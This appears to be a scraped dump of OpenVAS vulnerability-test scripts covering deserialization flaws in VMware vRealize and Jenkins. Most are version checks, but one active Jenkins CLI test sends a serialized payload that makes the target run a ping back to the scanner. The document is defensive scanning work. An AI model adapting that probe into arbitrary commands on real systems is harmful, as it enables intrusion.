"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2016-0020.nasl 11961 2018-10-18 10:49:40Z asteins $\n#\n# VMSA-2016-0020: vRealize Operations REST API Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140063\");\n script_cve_id(\"CVE-2016-7462\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:C\");\n script_version(\"$Revision: 11961 $\");\n script_name(\"VMSA-2016-0020: vRealize Operations REST API Deserialization Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0020.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Update to 6.4.0 or later\");\n\n script_tag(name:\"summary\", value:\"vRealize Operations update 
addresses REST API deserialization vulnerability.\");\n script_tag(name:\"insight\", value:\"vRealize Operations contains a deserialization vulnerability in its REST API implementation. This issue may result in a Denial of Service as it allows for writing of files with arbitrary content and moving existing files into certain folders. The name format of the destination files is predefined and their names cannot be chosen. Overwriting files is not feasible.\");\n\n script_tag(name:\"affected\", value:\"vRealize Operations 6.x < 6.4.0\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 12:49:40 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-16 15:53:11 +0100 (Wed, 16 Nov 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! 
version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version =~ \"^6\\.\" )\n if( version_is_less( version:version, test_version:\"6.4.0\" ) ) fix = '6.4.0';\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:C"}}, {"lastseen": "2019-05-29T18:35:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins FEDORA-2016-368780879d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871954", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871954", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2016-368780879d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871954\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:21:40 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2016-368780879d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QFJT3TVJVZH5CAVZOY7CPBY3DK7E4CPO\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.651.3~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins-remoting FEDORA-2016-368780879d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872082", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins-remoting FEDORA-2016-368780879d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872082\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:27:04 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins-remoting FEDORA-2016-368780879d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins-remoting'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins-remoting on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZW2KUKYLNLVDB7STLHLYALCUFLEGCRM6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins-remoting\", rpm:\"jenkins-remoting~2.62.3~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:19:23", "description": "This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.", "cvss3": {}, "published": "2017-01-30T00:00:00", "type": "openvas", "title": "Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-10-17T00:00:00", "id": "OPENVAS:1361412562310108063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108063\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2016-9299\");\n script_bugtraq_id(94281);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-30 13:00:00 +0100 (Mon, 30 Jan 2017)\");\n\n script_name(\"Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2016-11-16/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/94281\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an Jenkins allowing to transfer a serialized Java object to the Jenkins CLI,\n making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading\n to code execution, bypassing existing 
protection mechanisms.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of\n the affected application. Failed exploits will result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Jenkins LTS 2.19.2 and prior, Jenkins 2.31 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Jenkins to 2.32 or later / Jenkins LTS to 2.19.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.19.3\" ) ) {\n vuln = TRUE;\n fix = \"2.19.3\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.32\" ) ) {\n vuln = TRUE;\n fix = \"2.32\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:34", "description": "This host is running VMware vRealize\n Operations and is prone to code execution vulnerability.", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "openvas", "title": "VMware vRealize Operations Remote Code Execution Vulnerability - Apr17", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6934"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310811006", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811006", 
"sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_code_exec_vuln_apr17.nasl 11874 2018-10-12 11:28:04Z mmartin $\n#\n# VMware vRealize Operations Remote Code Execution Vulnerability - Apr17\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811006\");\n script_version(\"$Revision: 11874 $\");\n script_cve_id(\"CVE-2015-6934\");\n script_bugtraq_id(79648);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:28:04 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-21 10:42:44 +0530 (Fri, 21 Apr 2017)\");\n script_name(\"VMware vRealize Operations Remote Code Execution Vulnerability - Apr17\");\n\n script_tag(name:\"summary\", value:\"This host is running VMware vRealize\n Operations and is prone to code execution vulnerability.\");\n\n 
script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a deserialization error\n involving Apache Commons-collections and a specially constructed chain of\n classes exists.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code in the context of current user.\");\n\n script_tag(name:\"affected\", value:\"VMware vRealize Operations 6.x before 6.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade VMware vRealize Operations 6.2 or\n later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0009.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!vmVer = get_app_version(cpe:CPE, port:vmPort)){\n exit(0);\n}\n\n## vulnerable version 6.x before 6.2\nif(vmVer =~ \"^(6\\.)\")\n{\n if(version_in_range(version:vmVer, test_version:\"6.0\", test_version2:\"6.1\"))\n {\n report = report_fixed_ver(installed_version:vmVer, fixed_version:\"6.2\");\n security_message(data:report, port:vmPort);\n exit(0);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:55", "description": "This host is running VMware vRealize\n Orchestrator and is prone to code execution vulnerability.", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "VMware vRealize Orchestrator Remote 
Code Execution Vulnerability - Apr17", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6934"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310811005", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811005", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_orchestrator_code_exec_vuln_apr17.nasl 11863 2018-10-12 09:42:02Z mmartin $\n#\n# VMware vRealize Orchestrator Remote Code Execution Vulnerability - Apr17\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_orchestrator';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811005\");\n script_version(\"$Revision: 11863 $\");\n script_cve_id(\"CVE-2015-6934\");\n script_bugtraq_id(79648);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:42:02 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-20 18:03:53 +0530 (Thu, 20 Apr 2017)\");\n script_name(\"VMware vRealize Orchestrator Remote Code Execution Vulnerability - Apr17\");\n\n script_tag(name:\"summary\", value:\"This host is running VMware vRealize\n Orchestrator and is prone to code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to a deserialization error\n involving Apache Commons-collections and a specially constructed chain of\n classes exists.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code in the context of current user.\");\n\n script_tag(name:\"affected\", value:\"VMware vRealize Orchestrator 6.x before\n 6.0.5, 4.2.x and 5.x\");\n\n script_tag(name:\"solution\", value:\"Upgrade VMware vRealize Orchestrator to\n version 6.0.5 or apply patch available from vendor.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\"); # unreliable as patch is also available\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0009.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_vmware_vrealize_orchestrator_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/orchestrator/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!vmPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!vmVer = get_app_version(cpe:CPE, port:vmPort)){\n exit(0);\n}\n\n##4.2.x, 5.x\nif(vmVer =~ \"^(4\\.2\\.)\" || vmVer =~ \"^(5\\.)\")\n{\n VULN = TRUE;\n fix = \"Apply Patch from Vendor\";\n}\n\n## vulnerable version 6.x before 6.0.5\nif(vmVer =~ \"^(6\\.)\")\n{\n if(version_in_range(version:vmVer, test_version:\"6.0\", test_version2:\"6.0.4\"))\n {\n VULN = TRUE;\n fix = \"6.0.5 or Apply Patch from Vendor\";\n }\n}\n\nif(VULN)\n{\n report = report_fixed_ver(installed_version:vmVer, fixed_version:\"6.0.5\");\n security_message(data:report, port:vmPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:25:51", "description": "Jenkins is prone to remote code-execution vulnerability.", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "openvas", "title": "Jenkins CLI RMI Java Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8103"], "modified": "2019-10-17T00:00:00", "id": "OPENVAS:1361412562310105820", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105820", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins CLI RMI Java Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone 
Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105820\");\n script_bugtraq_id(77636);\n script_cve_id(\"CVE-2015-8103\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2019-10-17T11:27:19+0000\");\n\n script_name(\"Jenkins CLI RMI Java Deserialization Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/77636\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2015/q4/241\");\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2015-11-11/\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized object which executes a ping against the scanner.\");\n\n script_tag(name:\"insight\", value:\"Unsafe 
deserialization allows unauthenticated remote attackers to run arbitrary code on the Jenkins master.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"Jenkins is prone to remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Jenkins main line before 1.638, Jenkins LTS before 1.625.2.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-07-22 12:45:35 +0200 (Fri, 22 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/jenkins_cli\", 50000);\n script_mandatory_keys(\"jenkins/detected\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"dump.inc\");\n\nport = get_kb_item( \"Services/jenkins_cli\" );\nif( ! port )\n port = 50000;\n\nif( ! get_port_state( port ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\nheaders = raw_string( 0x00,0x14,0x50,0x72,0x6f,0x74,0x6f,0x63,0x6f,0x6c,0x3a,0x43,0x4c,0x49,0x2d,0x63,0x6f,0x6e,0x6e,0x65,0x63,0x74 );\nsend( socket:soc, data:headers );\nrecv = recv( socket:soc, length:512 );\n\nif( ! 
recv || \"JENKINS\" >!< recv ) {\n close( soc );\n exit( 0 );\n}\n\n# Used to confirm the vulnerability\nvtstrings = get_vt_strings();\nvtcheck = vtstrings[\"ping_string\"];\n\npayload = raw_string( 0x3c,0x3d,0x3d,0x3d,0x5b,0x4a,0x45,0x4e,0x4b,0x49,0x4e,0x53,0x20,0x52,0x45,0x4d,0x4f,0x54,0x49,0x4e,0x47,0x20,0x43,0x41,0x50,0x41,0x43,0x49,0x54,0x59,0x5d,0x3d,0x3d,0x3d,0x3e );\n\nex += raw_string(\n);\n\nif( host_runs(\"Windows\") == \"yes\" )\n{\n cmd = 'ping -c 5 ' + this_host();\n win = TRUE;\n}\nelse\n cmd = 'ping -c 5 -p ' + hexstr(vtcheck) + ' ' + this_host();\n\nlen = raw_string( strlen( cmd ) );\n\nex += len + cmd + raw_string(\n);\n\nex = base64( str:ex );\n\npayload += ex;\npayload += raw_string( );\n\nsend( socket:soc, data:payload );\n\nfor( i = 0; i < 3; i++ )\n{\n res = send_capture( socket:soc,\n data:\"\",\n timeout:2,\n pcap_filter: string( \"icmp and icmp[0] = 8 and dst host \", this_host(), \" and src host \", get_host_ip() ) );\n\n if( res && ( win || vtcheck >< res ) )\n {\n close( soc );\n report = 'By sending a special crafted serialized stream it was possible to execute `' + cmd + '` on the remote host\\nReceived answer:\\n\\n' + hexdump(ddata:( res ) );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( soc ) close( soc );\n\nexit( 0 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins-remoting FEDORA-2016-93679a91df", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872446", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872446", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins-remoting FEDORA-2016-93679a91df\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 